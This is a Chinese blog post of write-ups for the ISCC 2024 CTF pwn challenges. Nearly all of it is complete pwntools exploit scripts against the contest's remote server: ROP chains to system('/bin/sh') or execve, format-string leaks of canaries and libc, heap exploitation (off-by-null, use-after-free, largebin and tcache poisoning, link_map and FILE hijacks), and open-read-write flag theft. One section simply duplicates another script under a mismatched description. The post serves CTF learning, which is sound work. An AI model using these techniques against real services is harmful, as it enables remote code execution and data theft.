[ISCC 2024] pwn

news/2024/7/20 17:46:52/文章来源:https://blog.csdn.net/weixin_52640415/article/details/139277389

记得去年的ISCC,热闹。今年的逆向啥的都不会作了,就作了点PWN,有两个是师傅给的WP。也算凑齐了。

这网站比赛结束后,居然上不去了,弄得连几个题都不清楚了。

练武题

chao

这题比较搞,在edit有可读入0x20字节可以有8字节溢出,但后边有个菜单进去直接输入Flag就进到后门了。

Your_program

输入key的时候用到危险函数gets,利用这个溢出。PIE未开,直接写ROP。

__int64 authorize()
{char v1[28]; // [rsp+0h] [rbp-20h] BYREFint v2; // [rsp+1Ch] [rbp-4h]v2 = 2;printf("Enter key: ");gets(v1);if ( v1[27] != 0x41 ){puts("failed!");exit(0);}puts("successful!");return 0LL;
}

 

from pwn import *
context(arch='amd64', log_level='debug')
elf = ELF('./Your_program')#p = process('./Your_program')
p = remote('182.92.237.102', 10032)authorize = elf.sym['authorize']
bss = 0x403a00
pop_rdi = 0x0000000000401763 # pop rdi ; ret
pop_rsi = 0x0000000000401761 # pop rsi ; pop r15 ; ret#gdb.attach(p, "b*0x4012da\nc")
p.sendlineafter(b"Enter key: ", b'A'*0x20 + flat(bss, pop_rdi, elf.got['gets'], elf.plt['puts']-4, elf.sym['authorize']))
p.recvline()
libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - 0x83970
print(hex(libc_base))system = libc_base + 0x52290
bin_sh = libc_base + 0x1b45bd
p.sendlineafter(b"Enter key: ", b'A'*0x20 + flat(0, pop_rdi+1, pop_rdi, bin_sh, system))p.interactive()

*shopping

 n1ctf2018_null(通过劫持线程arena达到任意地址分配)

原题。

read会造成溢出,第1次不够再读会造成溢出。

size_t __fastcall sub_400BCA(__int64 a1, size_t a2)
{size_t result; // raxint v3; // [rsp+1Ch] [rbp-14h]size_t i; // [rsp+20h] [rbp-10h]for ( i = 0LL; ; i += v3 ){result = i;if ( i >= a2 )break;v3 = read(0, (void *)(a1 + i), a2);         // 分两次写实现溢出if ( v3 <= 0 ){write(1, "error\n", 6uLL);sub_400AD6(1LL);}}return result;
}

 进程中,当heap用完,再建时会建在线程数据块前,然后利用溢出将BSS的指针写到fastbin里。

from pwn import *context(arch='amd64', log_level='debug')sh = process('./p4')
#sh = remote('182.92.237.102', 10019)
#sh = remote('node3.buuoj.cn',26808)
elf = ELF('./p4')
system_plt = elf.plt['system']sh.sendlineafter(b"Enter the password: ",b"I'm ready for shopping")def add(size,n,content=b'', content2=b''):sh.sendlineafter(b"Action: ",b'1')sh.sendlineafter(b"Item ID: ",str(size).encode())sh.sendlineafter(b"Quantity: ",str(n).encode())if content == b'':sh.sendlineafter(b"Add gift message? (0/1): ",b'0')else:sh.sendlineafter(b"Add gift message? (0/1): ",b'1')sh.sendafter(b"Message: ",content)sleep(0.2)sh.send(content2)gdb.attach(sh, "b*0x400e32\nc")
'''
[+] In (0x7ffff0000000-0x7ffff3ffd000), permission=rw-0x7ffff00008b8 - 0x7ffff00008c0  →   "\x15\x40[...]" gef➤  search- 0x4015 little 0x00007fffe8000000-0x00007fffe8001000
[+] Searching '\x15\x40' in 0x00007fffe8000000-0x00007fffe8001000
[+] In (0x7fffe8000000-0x7ffff0000000), permission=rw-0x7fffe8000028 - 0x7fffe8000030  →   "\x15\x40[...]" '''
for i in range(12):add(0x4000,1000)#溢出,修改thread_arena,将bss上的fake_chunk接到fastbin里
add(0x4000,262,'0'*0x3FF0, b'1'*0x50 + p32(0) + p32(3) + 10*p64(0x60201d))payload = b'/bin/sh'.ljust(0xB,b'\x00') + p64(system_plt)
add(0x60,0,payload.ljust(0x60, b'b')) #申请到bss上,602038 修改函数指针,getshellsh.interactive()
#ISCC{63665ea3-5e5c-4109-a912-eceac236bb91}
#原文链接:https://blog.csdn.net/seaaseesa/article/details/107597557

miao

 32位程序,静态编译,gets可以溢出。

用ROP弄个chains再改改,绕过那些\n

from pwn import *
from struct import pack# Padding goes here
p = b''#p += pack('<I', 0x0806f30a) # pop edx ; ret
p += pack('<I', 0x0806f309) # pop ebx ; pop edx ; ret
p += pack('<I', 0x0) p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8666) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x08054c6b) # mov dword ptr [edx], eax ; ret
#p += pack('<I', 0x0806f30a) # pop edx ; ret
p += pack('<I', 0x0806f309) # pop ebx ; pop edx ; ret
p += pack('<I', 0x0) p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8666) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x08054c6b) # mov dword ptr [edx], eax ; ret
#p += pack('<I', 0x0806f30a) # pop edx ; ret
p += pack('<I', 0x0806f309) # pop ebx ; pop edx ; ret
p += pack('<I', 0x0) p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08049573) # xor eax, eax ; ret
p += pack('<I', 0x08054c6b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080def3d) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
#p += pack('<I', 0x0806f30a) # pop edx ; ret
p += pack('<I', 0x0806f309) # pop ebx ; pop edx ; ret
p += pack('<I', 0x080ea060) p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08049573) # xor eax, eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0807acff) # inc eax ; ret
p += pack('<I', 0x0806cf83) # int 0x80#io = process('./miao')
io = remote('182.92.237.102', 10015)
context(arch='i386', log_level='debug')#gdb.attach(io, "b*0x80489cf\nc")
#get canary
io.sendlineafter(b"Would you like to say something to it?\n", b'%31$x')
canary = int(io.recv(8), 16)io.sendlineafter(b" (  ^.^  ) \n", b'A'*100 + flat(canary,0,0,0) + p)io.interactive()

Flag

 什么年代了还32位程序。高度怀疑这些题的来历。

welcome有个printf,然后 back有个溢出

from pwn import *context(arch='i386', log_level='debug')
elf = ELF('./p3')p = remote('182.92.237.102', 10012)
#p = process('./p3')#gdb.attach(p, "b*0x8049382\nc")
p.sendlineafter(b"what's the content?\n", b'%19$p,%22$p,%27$p,')
#p.sendlineafter(b"what's the content?\n", b'%19$p,%22$p,%27$p,')p.recvuntil(b"Your answered:\n")
canary = int(p.recvuntil(b',', drop=True), 16)
rbp = int(p.recvuntil(b',', drop=True), 16)
libc = int(p.recvuntil(b',', drop=True), 16) - 0x1aed5 #0x1eed5
print(f"{libc = :x} {canary = :x} {rbp = :x}")bin_sh = libc + 0x18c363
system = libc + 0x41360#p.sendafter(b"Input:\n", b'\x00'*0x88 + flat(canary,1,0,0, elf.plt['puts'],0, elf.got['puts']))
p.sendafter(b"Input:\n", b'\x00'*0x88 + flat(canary,1,0,0, system,0, bin_sh))p.interactive()

eazy_heap

 突然这难度就上来了,libc-2.35 off_by_null 还好有模板。

造重叠块后往栈里写ORW

from pwn import *context(arch='amd64',log_level='debug')
libc = ELF('./libc.so.6') #libc-2.35-0ubuntu3
#p = process('./CAT_DE')
p = remote('182.92.237.102', 2122)def add(size, msg=b'A'):p.sendlineafter(b"input your car choice >> \n", b'1')p.sendlineafter(b"size:\n", str(size).encode())p.sendafter(b"content:\n", msg)def free(idx):p.sendlineafter(b"input your car choice >> \n", b'2')p.sendlineafter(b"idx:\n", str(idx).encode())def show(idx):p.sendlineafter(b"input your car choice >> \n", b'3')p.sendlineafter(b"idx:\n", str(idx).encode())p.recvuntil(b"context:\n")def edit(idx, msg): #off_by_nullp.sendlineafter(b"input your car choice >> \n", b'4')p.sendlineafter(b"idx:\n", str(idx).encode())p.sendafter(b"content:\n", msg)add(0x410) #A 0
add(0x120)
add(0x410) #B 2
add(0x440) #C 3 C落在尾字节为0的位置  xxxc00 x 0x450
add(0x140)
add(0x4d0) #D
add(0x410) #E 6
add(0x110)for i in [0,3,6,2]:free(i)#newB 比oldB 大0x20 oldC头部的largebin指针保留在newB尾部
add(0x430, b'\x00'*0x418+p32(0x5a0)) #0 new B = B +0x20
add(0x410) #2 E
add(0x410) #3 A
add(0x420) #6 new C = C-0x20free(3) #A
free(6) #newCadd(0x410, p64(0)+ b'\0') #3 保留第2组指针bk尾字节置0后,指向第1块保留的指针
add(0x420) #6 newCfree(6) #newC
free(2) #E
free(5) #Dadd(0x4f0, b'A'*0x4e0+b'\0') #2 newD = D+0x20
add(0x3f0) #5 newE
add(0x420) #6 newCfree(4)
add(0x148) #off_by_null newD 0x501->0x500 , pre_size=0x4a0
edit(4, b'A'*0x140+p64(0x5a0))free(2) #向前合并 C+4+D 形成重叠show(6)
libc.address = u64(p.recv(8)) - 0x21a000
print(f"{libc.address = :x}")
heap_base = u64(p.recv(16)[8:]) - 0xc20
print(f"{heap_base = :x}")pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
pop_rsi = libc.address + 0x000000000002be51 # pop rsi ; ret
pop_rdx = libc.address + 0x000000000011f497 # pop rdx ; pop r12 ; ret
pop_rcx = libc.address + 0x000000000008c6bb # pop rcx ; ret
pop_rax = libc.address + 0x0000000000045eb0 # pop rax ; ret
pop_rbp = libc.address + 0x000000000002a2e0 # pop rbp ; ret
syscall = libc.sym['getpid'] + 9
leave_ret = libc.address + 0x00000000000562ec # leave ; ret  ??
stdout = libc.sym['_IO_2_1_stdout_']add(0x88)
add(0x88)
add(0xc8)
add(0xc8)
free(2)
free(8)
edit(6, b'A'*0x68 + flat(0x91, (heap_base>>12)^(libc.sym['environ']-0x10)))
add(0x88) #2
add(0x88) #8
show(8)
stack = u64(p.recv(0x18)[0x10:]) - 0x140 - 8 free(10)
free(9)
edit(6, b'A'*0x68 + flat(0x91, b'B'*0x88, 0xd1, (heap_base>>12)^stack))
add(0xc8)
#gdb.attach(p, "b*0x5555555555dd\nc")
orw = flat([pop_rdi, stack, pop_rsi,0, pop_rax,2, syscall, #open(flag)pop_rdi,3, pop_rsi, stack+0xc0, pop_rdx,0x50,0, pop_rax, 0, syscall, #read(3,buf,0x50)pop_rdi,1, pop_rax, 1, syscall
])add(0xc8, b'/flag\0\0\0'+orw)p.interactive()

easyshell

 gets+printf先泄露地址,然后溢出写后门

from pwn import *context(arch='amd64', log_level='debug')#p = process('./p2')
p = remote('182.92.237.102', 10011)
p.sendlineafter(b'>>', b'flagis %15$p,%16$p,%17$p,')canary = int(p.recvuntil(b',', drop=True),16)
rbp = int(p.recvuntil(b',', drop=True),16)
elf = int(p.recvuntil(b',', drop=True),16)p.sendlineafter(b'>>', b'exit'.ljust(56,b'\x00') + flat(canary,rbp,elf-0x1520+0x128e))p.interactive()

U

 32位,堆题,有UAF和管理块。控制管理块

from pwn import *context(arch='i386', log_level='debug')
libc = ELF('./libc6-i386_2.31-0ubuntu9.14_amd64.so')
elf = ELF('./U')menu = b"What's your choice :"
def add(size,msg=b'A'):p.sendlineafter(menu, b'1')p.sendlineafter(b"Note size :", str(size).encode())p.sendafter(b"Content :", msg)def free(idx):p.sendlineafter(menu, b'2')p.sendlineafter(b"Index :", str(idx).encode())def show(idx):p.sendlineafter(menu, b'3')p.sendlineafter(b"Index :", str(idx).encode())#p = process('./U')
p = remote('182.92.237.102', 10016)#1, chunk2.data = chunk0.manage 修改指针泄露libc
add(0x18)
add(0x18)
free(0)
free(1)
add(8, flat(elf.sym['print_note_content'], elf.got['read']))  show(0)
libc.address = u32(p.recv(4)) - libc.sym['read']
print(f"{libc.address = :x}")#2, 将chunk0.cmd改为gets 用show实现对后边chunk1的写
free(2)
add(8, flat(libc.sym['gets']))#3,让chunk1.ptr=notelist 泄露堆地址,获得tcache的key
show(0)
p.sendline(flat(libc.sym['gets'], next(libc.search(b'/bin/sh\0')), 0, 0x21, b'B'*0x1c, 0x11,  elf.sym['print_note_content'], elf.sym['notelist'],0 , 0x21, elf.got['free']))
show(1)
heap = u32(p.recv(4)) - 0x1a0
print(f"{heap = :x}")#4,泄露栈上的指针 使用25->61->43的链修改为指向count,chunk[2],chunk[3],使count=2,清掉chunk2,3
show(0)
p.sendline(flat(libc.sym['gets'], next(libc.search(b'/bin/sh\0')), 0, 0x21, b'B'*0x1c, 0x11,  libc.sym['printf'], b',%8$p,%25$p,%61$p,%43$p,'))#gdb.attach(p, "b*0x804964a\nc")
show(1)
p.recvuntil(b',')
stack = int(p.recvuntil(b',', drop=True),16) - 0x88 + 0xfc
print(f"{stack = :x}")
pause()#count=2
show(0)
p.sendline(flat(libc.sym['gets'], next(libc.search(b'/bin/sh\0')), 0, 0x21, b'B'*0x1c, 0x11,  libc.sym['printf'], f'%{(stack&0xffff)-4}c%25$hn,,,'.encode()))
show(1) #25, 61->43
p.recvuntil(b',,,')show(0)
p.sendline(flat(libc.sym['gets'], next(libc.search(b'/bin/sh\0')), 0, 0x21, b'B'*0x1c, 0x11,  libc.sym['printf'], f'%{0xc044-4}c%61$hn,,,'.encode()))
show(1) #25, 61->43
p.recvuntil(b',,,')show(0)
p.sendline(flat(libc.sym['gets'], next(libc.search(b'/bin/sh\0')), 0, 0x21, b'B'*0x1c, 0x11,  libc.sym['printf'], f'%254c%43$hhn,,,'.encode()))
show(1) #25, 61->43
p.recvuntil(b',,,')#cleak notelist 2-3
for v in range(0x50,0x58):show(0)p.sendline(flat(libc.sym['gets'], next(libc.search(b'/bin/sh\0')), 0, 0x21, b'B'*0x1c, 0x11,  libc.sym['printf'], f'%{v-4}c%61$hhn,,,'.encode()))show(1) #25, 61->43show(0)p.sendline(flat(libc.sym['gets'], next(libc.search(b'/bin/sh\0')), 0, 0x21, b'B'*0x1c, 0x11,  libc.sym['printf'], f'%252c%43$hhn,,,'.encode()))show(1) #25, 61->43p.recvuntil(b',,,')'''
0xffddbd50│+0x0000: 0x099de1d0  →  0xf7dd72b0  →  <printf+0> endbr32     ← $esp
0xffddbd54│+0x0004: 0xffddbd68  →  0xf7f70a31  →  0xe0f7ecc5
0xffddbd58│+0x0008: 0x00000004
0xffddbd5c│+0x000c: 0x080495a5  →  <print_note+16> add ebx, 0x2a5b
0xffddbd60│+0x0010: 0x0804a0e3  →  "What's your choice :"                    #4
0xffddbd64│+0x0014: 0x00000001
0xffddbd68│+0x0018: 0xf7f70a31  →  0xe0f7ecc5
0xffddbd6c│+0x001c: 0x2d45a600
0xffddbd70│+0x0020: 0xffddbd88  →  0xffdd0a33  →  0x00000000                 #8
0xffddbd74│+0x0024: 0x0804c000  →  0x0804bf0c                                #9
0xffddbd78│+0x0028: 0xffddbd98  →  0x00000000    ← $ebp
0xffddbd7c│+0x002c: 0x080497d6  →  <main+180> jmp 0x80497f5 <main+211>
0xffddbd80│+0x0030: 0x000000010xffddbdb4│+0x0064: 0xffddbe44  →  0xffddd2ea  →  0x00552f2e ("./U"?)        #25->61->43:count
0xffddbdfc│+0x00ac: 0x080491a0  →  <_start+0> endbr32                        #43
0xffddbe44│+0x00f4: 0xffddd2ea  →  0x00552f2e ("./U"?)                       #61'''#5,tcache attack 写got.free 为system ,chunk0.ptr->/bin/sh free(0)
show(0)
p.sendline(flat(libc.sym['gets'],next(libc.search(b'/bin/sh\0')),0,     0x21, b'B'*0x1c,     0x11,0,0,0,   0x21, elf.got['free'], heap+0x10))add(0x18)
add(0x18, flat(libc.sym['system'], 0x8049663)) #got.free->systemfree(0)
#gdb.attach(p)
#pause()p.interactive()#ISCC{9a7c5fbc-9d62-4edc-998a-62e8152f4df3}

ISCC_easy 

printf+溢出,没可说的了

from pwn import *context(arch='i386', log_level='debug')
libc = ELF('/home/kali/ctf/0501/libc6-i386_2.31-0ubuntu9.14_amd64.so')#p = process('./ISCC_easy')
#gdb.attach(p, "b*0x80492e3\nc")
p = remote('182.92.237.102', 10013)p.sendafter(b"Let's have fun!\n", p32(0x804c030)+b'A%4$hhn,%12$p,%15$p,')
p.recvuntil(b',')
stack = int(p.recvuntil(b',', drop=True), 16)
libc.address = int(p.recvuntil(b',', drop=True), 16) - 245 - libc.sym['__libc_start_main']
print(f"{libc.address = :x}")p.sendafter(b"Input:\n", b'A'*0x94 + flat(libc.sym['system'],0, next(libc.search(b'/bin/sh\0'))))p.interactive()

heapheap

 libc-2.31 UAF ORW

只能建大块,写link_map,模板

from pwn import *context(arch='amd64', log_level='debug')
elf = ELF("./heapheap")
libc = ELF('./libc-2.31.so')#p = process('./heapheap')
p = remote('182.92.237.102', 11000)menu = b"Your choice:\n"
def add(idx,size):p.sendlineafter(menu, b'1')p.sendlineafter(b"index:\n", str(idx).encode())p.sendlineafter(b"Size:\n", str(size).encode())def free(idx):p.sendlineafter(menu, b'4')p.sendlineafter(b"index:", str(idx).encode())def show(idx):p.sendlineafter(menu, b'2')p.sendlineafter(b"index:\n", str(idx).encode())p.recvline()def edit(idx, msg):p.sendlineafter(menu, b'3')p.sendlineafter(b"index:\n", str(idx).encode())p.sendafter(b"context: \n", msg)add(0, 0x428)
add(1, 0x500)
add(2, 0x418)free(0)
add(3, 0x500) #0 unsort->largebin
'''
0x7ffff7fc0fe0: 0x0000555555a01290      0x0000555555a01290  largebin
0x555555a012a0: 0x00007ffff7fc0fd0      0x00007ffff7fc0fd0
0x555555a012b0: 0x0000555555a01290      0x0000555555a01290 -> heap_self -> rtld_global - 0x20
'''
show(0)
large_430 = u64(p.recv(6).ljust(8, b'\x00'))
libc_base = large_430 - 0x430 - 0x30 - libc.sym['__malloc_hook']edit(0, b'A'*0x10)
show(0)
p.recv(0x10)
heap_self = u64(p.recv(6).ljust(8, b'\x00'))
heap_base = heap_self - 0x290ld_remote_off = 0
ld_remote_off = 0x6000
rtld_global = libc_base + 0x228060 - ld_remote_off 
print(f"{libc_base =:x} {large_430 =:x} {rtld_global =:x} {heap_self =:x}")free(2)
edit(0, flat(large_430,large_430, heap_self, rtld_global-0x20))
add(4, 0x500)
'''
0x7ffff7ffd060 <_rtld_global>:  0x00007ffff7ffe190      0x0000000000000004
0x7ffff7ffd060 <_rtld_global>:  0x0000555555a01bd0 -> chunk2
'''libc.address = libc_base
one = libc_base + 0xe3b04
pop_rdi = libc_base+0x23b6a
pop_rsi = libc_base+0x2601f
pop_rdx = libc_base+0x119431 #pop rdx;pop r12;ret
setcontext_3d = libc.sym['setcontext'] + 0x3d
chunk_base = heap_base + 0xbd0link_map=p64(0)
link_map+=p64(rtld_global+0x16e0)
link_map+=p64(0)
link_map+=p64(chunk_base)
link_map+=p64(0)*28 
link_map+=p64(chunk_base+0x110)
link_map+=p64(chunk_base+0x110+0x20)
link_map+=p64(chunk_base+0x110+0x10)
link_map+=p64(0x20)
link_map+=b"flag\0\0\0\0"
link_map+=p64(chunk_base)
link_map+=p64(setcontext_3d)
link_map+=p64(pop_rdi+1)  #ret 
link_map+=p64(0)*12
link_map+=p64(0)
link_map+=p64(chunk_base+0x1f8)
link_map+=p64(0)*2
link_map+=p64(0x100)
link_map+=p64(0)*2
link_map+=p64(chunk_base+0x1f8)
link_map+=p64(libc.sym['read'])  #read(0, chunk_base+0x238, 0x100)
link_map+=p64(0)*36
link_map+=p64(0x800000000)edit(2, link_map)p.sendlineafter(menu, b'5')#orw
flag_addr = chunk_base+0x130
orw = flat([pop_rdi, flag_addr, pop_rsi,0, libc.sym['open'], pop_rdi, 3, pop_rsi,heap_base+0x2a0,pop_rdx,0x50,0, libc.sym['read'],pop_rdi, 1, pop_rsi,heap_base+0x2a0,pop_rdx,0x50,0, libc.sym['write']])p.send(orw)p.interactive()

擂台题

*babyheap

先是个基于time的srand,不过ida翻译过来的不能直接用

srand(100 * ((__int64)((((__int64)0xA3D70A3D70A3D70BLL * (unsigned __int128)v0) >> 64) + v0) >> 6));

师傅的WP里是v0-v0%100,不知道为什么编译后就这么复杂了。

然后是写__stdout_FILE

from ctypes import *
from pwn import *
import timecontext(arch='amd64', log_level='debug')
elf = ELF('./babyheap')
libc = ELF('/home/kali/ctf/0501/libc.so')
clibc = cdll.LoadLibrary("/home/kali/ctf/0501/libc.so")def check1(s):v3 = [48,57,65,90,97,122]chk = ''for i in range(s):while True:v0 = clibc.rand()%6if v0&1 == 0:breakchk += chr(v3[v0] + clibc.rand()%(v3[v0+1]-v3[v0]+1))return chkdef edit(idx,msg):p.sendlineafter(b"Please Select: ", b'3')p.sendlineafter(b"Index: ", str(idx).encode())p.sendlineafter(b"Size: ", b'256')p.sendlineafter(b"Content: ", msg)def add(idx,size):p.sendlineafter(b"Please Select: ", b'1')p.sendlineafter(b"Index: ", str(idx).encode())p.sendlineafter(b"Size: ", str(size).encode())def free(idx):p.sendlineafter(b"Please Select: ", b'2')p.sendlineafter(b"Index: ", str(idx).encode())def show(idx,size):p.sendlineafter(b"Please Select: ", b'3')p.sendlineafter(b"Index: ", str(idx).encode())def gift(s):p.sendlineafter(b"Please Select: ", b'114514')p.sendlineafter(b"Please enter the captcha: ", s.encode())p = process('./babyheap')#v0 = clibc.time(0)  #返回秒数,但直接调用会报错?
#seed = (100 * (((((0xA3D70A3D70A3D70B-(1<<64)) * v0)%(1<<128) >> 64) + v0) >> 6))%(1<<32)
'''
.text:0000000000001269 89 C0                         mov     eax, eax
.text:000000000000126B 48 89 45 F8                   mov     qword ptr [rbp+seed], rax
.text:000000000000126F 48 8B 4D F8                   mov     rcx, qword ptr [rbp+seed]
.text:0000000000001273 48 BA 0B D7 A3 70 3D 0A D7 A3 mov     rdx, 0A3D70A3D70A3D70Bh
.text:000000000000127D 48 89 C8                      mov     rax, rcx
.text:0000000000001280 48 F7 EA                      imul    rdximul rdx : rax *= rdx ,rdx存的是积的符号扩展,不能用(a*b)>>64表示,要转负数
'''v0 = int(time.time())
seed = v0 - v0%100
clibc.srand(seed)s1 = check1(8)
s2 = check1(16)
s3 = check1(16)
print('ck1:', s1, s2, s3)
p.sendlineafter(b"To verify that you are AI. Enter the captcha: ", s1.encode())gdb.attach(p)
pause()gift(s2)
p.recvuntil(b"Give You: ")
libc.address = int(p.recvline(), 16) - libc.sym['printf']
print(f"{libc.address = :x}")add(0,0x20)
off = (0x9db0-0x8060)//8
'''
gef➤  x/40gx 0x0000555555558000
0x555555558000: 0x0000555555558000      0x0000000200000000
0x555555558010: 0x0000000000000000      0x0000000000000000
0x555555558020: 0x0000000000000000      0x0000000000000000
0x555555558030: 0x0000000000000000      0x0000000000000000
0x555555558040: 0x4a6b326e41453330      0x3778306b3838794e
0x555555558050: 0x0000000000000000      0x0000000000000000
0x555555558060: 0x0000555555559db0      0x0000000000000000
'''fake_IO = b'/bin/sh\x00'
fake_IO += p64(0)
fake_IO += p64(0)
fake_IO += p64(libc.sym['__stdio_close'])
fake_IO += p64(1)
fake_IO += p64(0)
fake_IO += p64(0)
fake_IO += p64(0)
fake_IO += p64(0)
fake_IO += p64(libc.sym['system'])edit(0,p64(libc.sym['__stdout_FILE']))
edit(off, fake_IO)gift(s3)  #call printf p.interactive()

curious

代码很乱,前边有个base变表检查,然后就是个溢出,看代码的难度

__int64 __fastcall sub_40200C(__int64 a1, __int64 a2, __int64 a3, __int64 a4, __int64 a5, u32 a6)
{void *v6; // rdi__int64 v7; // r8u32 v8; // r9dint v9; // edxint v10; // ecxint v11; // r8dint v12; // r9dsub_419300((int *)off_4C2730, 0LL, 2, 0LL, a5, a6);v6 = off_4C2738;sub_419300((int *)off_4C2738, 0LL, 2, 0LL, v7, v8);sub_401DB5((__int64)v6, 0, v9, v10, v11, v12);if ( (unsigned int)sub_401F47(byte_4C54E0) )  // oh1yessub_419120("Go out!");elsesub_401F7E();                               // 溢出return 0LL;
}
from pwn import *context(arch='amd64', log_level='debug')#p = process('./curious')
#gdb.attach(p, "b*0x401ff3\nc")
p = remote('182.92.237.102', 10031)p.sendafter(b"Do you know what I want?", b'oh1yes') #变表b64 a-zA-Z0-9+/ B2GXEwvZ
p.sendlineafter(b"give me your name", b'A')pop_rdi = 0x0000000000401912 # pop rdi ; ret
pop_rsi = 0x000000000040f49e # pop rsi ; ret
pop_rdx = 0x000000000040181f # pop rdx ; ret
pop_rax = 0x0000000000452af7 # pop rax ; ret
syscall = 0x00000000004012d3 # syscall
bin_sh  = 0x4978b5
p.sendlineafter(b"Now what do you want to say?", b'A'*0x20+ flat(0,pop_rdi, bin_sh, pop_rsi,0,pop_rdx,0, pop_rax, 59, syscall))p.interactive()
#ISCC{nsKy2vjTBm82ZDshA5XSoEOm2IWSfc5UXDWb}

great

还是32位gets

from pwn import *context(arch='amd64', log_level='debug')#p = process('./curious')
#gdb.attach(p, "b*0x401ff3\nc")
p = remote('182.92.237.102', 10031)p.sendafter(b"Do you know what I want?", b'oh1yes') #变表b64 a-zA-Z0-9+/ B2GXEwvZ
p.sendlineafter(b"give me your name", b'A')pop_rdi = 0x0000000000401912 # pop rdi ; ret
pop_rsi = 0x000000000040f49e # pop rsi ; ret
pop_rdx = 0x000000000040181f # pop rdx ; ret
pop_rax = 0x0000000000452af7 # pop rax ; ret
syscall = 0x00000000004012d3 # syscall
bin_sh  = 0x4978b5
p.sendlineafter(b"Now what do you want to say?", b'A'*0x20+ flat(0,pop_rdi, bin_sh, pop_rsi,0,pop_rdx,0, pop_rax, 59, syscall))p.interactive()
#ISCC{nsKy2vjTBm82ZDshA5XSoEOm2IWSfc5UXDWb}

simulation_game

libc-2.35 修改mp_.tcache_max_bins 改最大tcache不是改大小是改计数,每个大0x10

largebinattack写到mp_.tcache_max_bins

然后是tcache attack写orw,不过先要读下目录,知道文件叫啥。

from pwn import *
from ctypes import *context(arch='amd64', log_level='debug')
libc = ELF('./libc.so.6')
clibc = cdll.LoadLibrary("./libc.so.6")#p = process('./simulation_game')
p = remote('182.92.237.102',8888)seed = int(time.time())//10
clibc.srand(seed)
m1 = clibc.rand() % 0x10000 + 4660
m2 = clibc.rand() % 0x10000 + 87672
m3 = clibc.rand() % 0x10000 + 170684 #
m4 = clibc.rand() % 0x10000 + 253680def add(idx,size,msg=b'A'): #size  1-5 x500 520 540 560 580p.sendlineafter(b"> ", str(m1).encode())  #1startp.sendlineafter(b"> ", b'6') #save p.sendlineafter(b"> ", str(idx).encode()) #idx 0-11p.sendlineafter(b"> ", size) #size  1-5 x500 520 540 560 580p.sendafter(b"name: ", msg)p.sendlineafter(b"> ", b'7') #return 0edit = add
def free(idx, ret=b'7', free=b'1'):p.sendlineafter(b"> ", str(m2).encode())  #2loadp.sendlineafter(b"> ", str(idx).encode()) #idx 0-11p.sendlineafter(b"> ", free) #freep.sendlineafter(b"> ", ret) #return 0def load_and_save(idx1,idx2,msg): #load no free and savep.sendlineafter(b"> ", str(m2).encode())  #2loadp.sendlineafter(b"> ", str(idx1).encode()) #idx 0-11p.sendlineafter(b"> ", b'0') #freep.sendlineafter(b"> ", b'6') #save p.sendlineafter(b"> ", str(idx2).encode()) #idx 0-11p.sendlineafter(b"> ", b'1') #size  1-5 x500 520 540 560 580p.sendafter(b"name: ", msg)p.sendlineafter(b"> ", b'7') #return 0def show():p.sendlineafter(b"> ", str(m2).encode())  #2loadp.recvuntil(b'\x1bc0..........')v = p.recvuntil(b'11...')+p.recvuntil(b'\n')p.sendlineafter(b"> ", b'88')return vdef debug(idx,msg):p.sendlineafter(b"> ", str(m4).encode())  #1startp.sendlineafter(b"Choice a file for debugging.\n", str(idx).encode()) #idx 0-11p.sendafter(b"data: ", msg)####################################################################
#largebin attack 在mp_.tcache_max_bins写地址,使0x500块进tcache 
####################################################################add(0,b'2') #save
add(1,b'1')
add(2,b'1')  #4=2+0x20
free(0)
add(3,b'3')  #0 large
free(2)      #4 unsort
v = show().split(b'\n')
large500 = u64(v[0].ljust(8, b'\x00'))
libc.address = large500 - 0x21b110
print(f"{libc.address = :x}")tcache_max_bins = libc.sym['obstack_exit_failure'] - 0x20 #mp_.tcache_max_bins
print(f"{tcache_max_bins = :x}")edit(0, b'1', flat(large500,large500,0, tcache_max_bins-0x20))
add(4,b'3')  #largebin attack 0x100000=chunk4-0x10####################################################################
#tcache attack 写orw到栈
####################################################################free(3)
free(4)v = show().split(b'\n')
heap = u64(v[3][11:].ljust(8, b'\x00'))<<12
edit(4, b'3', p64(0x100050^(heap>>12)))
add(5,b'3')
add(6,b'3', flat(0x100100, libc.sym['_environ'], 0x100000)) #
show()
v = show().split(b'\n')
stack = u64(v[9][11:].ljust(8, b'\x00')) - 0x150
print('vuln ret:', hex(stack))#gdb.attach(p, "b*0x55555555635a\nc")load_and_save(8,10, flat(1,0, stack, 0x100050)) #从8中读入全0的参数写入0x100000避免参数进入指针区,并置s,chunk0#gdb.attach(p, "b*0x555555556488\nc")pop_rdi = libc.address + 0x000000000002a3e5 # pop rdi ; ret
pop_rsi = libc.address + 0x000000000002be51 # pop rsi ; ret
pop_rdx = libc.address + 0x00000000000904a9 # pop rdx ; pop rbx ; ret
pop_rax = libc.address + 0x0000000000045eb0 # pop rax ; ret
syscall = next(libc.search(asm('syscall;ret')))orw = flat([pop_rdi, stack+0xc8, pop_rsi,0, pop_rdx,0,0, pop_rax,2, syscall,  # openpop_rdi, 3, pop_rsi, 0x100080, pop_rdx,0x80,0, pop_rax,0, syscall,  # readpop_rdi, 1, pop_rax,1, syscall # write
]) + b'flllll1ll1lllla4444444444444444gGggGG\x00'#找不到文件,读目录
